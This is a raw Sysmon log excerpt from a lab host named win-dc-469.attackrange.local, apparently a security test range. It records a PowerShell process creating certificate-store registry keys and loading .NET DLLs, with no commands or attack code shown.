12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347991Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347990Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347989Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347988Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347987Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347986Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347985Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347984Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347983Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347982Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs 12241200x800000000000000057347981Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs 12241200x800000000000000057347980Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates 12241200x800000000000000057347979Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347978Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople 12241200x800000000000000057347977Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347976Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347975Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347974Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057347973Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs 12241200x800000000000000057347972Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs 12241200x800000000000000057347971Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates 12241200x800000000000000057347970Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot 12241200x800000000000000057347969Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CTLs 12241200x800000000000000057347968Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\CRLs 12241200x800000000000000057347967Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates 734700x800000000000000057347966Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\1d96a7ae85e0bc7620b8688b778d0d77\System.Numerics.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Numerics.dllMD5=E2F37D6662BF0951356738A4F5ADB453,SHA256=D9849E412FEF691733299C42A71A6EFFFD859C8E88A0F5283ECC1FE5761EC4CCfalse-Unavailable 12241200x800000000000000057347965Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347964Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root 12241200x800000000000000057347963Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347962Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347961Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347960Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root 12241200x800000000000000057347959Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CTLs 12241200x800000000000000057347958Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\CRLs 734700x800000000000000057347957Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\85691b702c65c1297dd5294e1969beb4\System.DirectoryServices.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.DirectoryServices.dllMD5=05D15B1B56CA953CA35E6738883CB557,SHA256=68DA3DBA92F2FFE1AAD95B46E65186EE16FC700AF01738E838732EF0B94F1A98false-Unavailable 12241200x800000000000000057347956Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates 12241200x800000000000000057347955Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\AuthRoot 12241200x800000000000000057347954Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs 12241200x800000000000000057347953Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs 12241200x800000000000000057347952Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates 12241200x800000000000000057347951Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347950Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT 12241200x800000000000000057347949Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs 12241200x800000000000000057347948Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs 12241200x800000000000000057347947Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates 12241200x800000000000000057347946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 12241200x800000000000000057347945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Root 734700x800000000000000057347944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x800000000000000057347943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057347942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057347941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057347940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057347938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057347930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\d0fbbab68671be0c0f3a6297e7ca803d\System.Management.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Management.dllMD5=DBB27AB7CAB61053088108EADD3FF3A1,SHA256=703DD09A5B05E85DAC24B667BC3245FBD5E5656E5310E2C12D07854509D5B197false-Unavailable 12241200x800000000000000057347929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057347923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057347922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057347921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057347919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CTLs 12241200x800000000000000057347918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\CRLs 12241200x800000000000000057347917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates 12241200x800000000000000057347916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\CA 12241200x800000000000000057347914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs 12241200x800000000000000057347912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates 12241200x800000000000000057347911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\CA 12241200x800000000000000057347910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs 12241200x800000000000000057347909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:44.975{8B6011A9-5BA4-618E-53F3-04000000F101}4192C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs 734700x800000000000000057347908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 